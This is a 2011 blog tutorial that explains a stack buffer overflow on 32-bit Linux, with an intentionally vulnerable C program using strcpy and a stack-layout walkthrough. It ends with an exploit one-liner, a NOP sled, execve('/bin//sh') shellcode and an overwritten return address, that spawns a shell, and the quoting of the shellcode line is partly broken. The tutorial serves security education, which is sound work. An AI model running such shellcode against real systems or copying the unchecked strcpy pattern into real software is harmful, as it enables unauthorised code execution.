Understanding a simple buffer overflow vulnerability

Posted: September 17, 2011 in Exploitation, Stack Smashing

One of the main objectives of writing this tutorial is to show people that exploiting a buffer overflow vulnerability is NO BIG DEAL. We’re dealing with a linux OS here, so take into considerations that some parts of the explanation will be linux specific. Now, to the point.

  • What is a buffer overflow vulnerability?

A buffer overflow vulnerability is one where a program disregards bounds checking while copying data onto a buffer present in memory. This allows data to overflow the buffer and be copied into random addresses, thus allowing a user to write arbitrary data into memory locations which ideally should not be overwritten.

  • What can be done by exploiting one?

In most cases, the user can execute arbitrary code on the host system. This highly depends on the user executing the program. If it’s root user, then voila – ANYTHING is possible! ๐Ÿ˜€

  • Is there any background knowledge needed for exploitation?

A good understanding of the memory layout during program execution along with a bit of patience and self motivation is necessary to exploit one.

Now, assuming that you’ve understood the basics of stack memory layout from the background info section, let’s move onto looking at a simple buffer overflow exploit.

Exploiting a buffer overflow

Let’s consider a sample program:

#include <stdio.h>

#include <string.h>

void print_argument ( char **argv ) {

/* This function is vulnerable to a buffer overflow attack */

char buffer[50];

strcpy ( buffer, argv[1] );

printf ( “Argument : %s\n”, buffer );

return;

}

int main ( int argc, char **argv ) {

if ( argc >= 2 ) {

print_argument ( argv );

}

return 0;

}

The above program prints the first command line argument provided to the program. Let’s examine why this program is vulnerable to a buffer overflow attack. A critical question that should be answered is:

  • What if we provide a command line argument whose length is greater than 50?

We know that the variable buffer of size 50 bytes is allocated on the stack. Below that lies the base pointer, and below that lies the return address of the main() function. The outline of stack layout is given below:

Stack Layout

Stack Layout

Now, if we provide more than 50 bytes as command line argument, strcpy() function tried to copy all the values of argv[1] onto buffer, thus overflowing the buffer and overwriting the values of the saved base pointer and the return address. In a x86 32 bit system, the word size is 4 bytes. Hence, if we provide 58 bytes, we’ll successfully overwrite the value of return address and base pointer.

When strcpy() finishes, it’ll try to pop out the base pointer (some random value overwritten) and store the return address in EIP. This return address is also overwritten by us, and hence we have control of where the processor must start executing the next instruction. Now, if we store some shell code (or machine code, which I’ll explain later) in the buffer, and overwrite the return address as the starting address of buffer, then the processor will start executing from the buffer as if it were instructions. VOILA, we can execute whatever we want! ๐Ÿ˜€

Now, let’s write an exploit to give us a shell when we execute this program. Don’t worry if you don’t understand the exploit, there’s a lot to be learnt about shell codes and how they work before you can actually go to write an exploit. In this case, let’s assume that the address where the variable ‘buffer’ starts is 0xbfffd89c.

$ gcc printargs.c -o printargs

$ ./printargs `python -c ‘print “\x90″*10+”\x6a\x31\x66\x58\xcd\x80\x66\x89″ + \xc3\x66\x89\xc1\x6a\x46\x66\x58” + “\xcd\x80\x31\xc9\xf7\xe1\x51\x68” + “\x2f\x2f\x73\x68\x68\x2f\x62\x69” + “\x6e\x89\xe3\xb0\x0b\xcd\x80” + “\x41″*5+”\x9c\xd8\xff\xbf”‘`

sh:~$

That’s it, you’ve got a shell! ๐Ÿ™‚ It’s as simple as that folks, nothing more to it! ๐Ÿ˜€

Advertisements
Comments
  1. scaarup says:

    Maybe you could show us how (with gdb) you found out that the variable buffer starts at address 0xbfffd89c ?

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s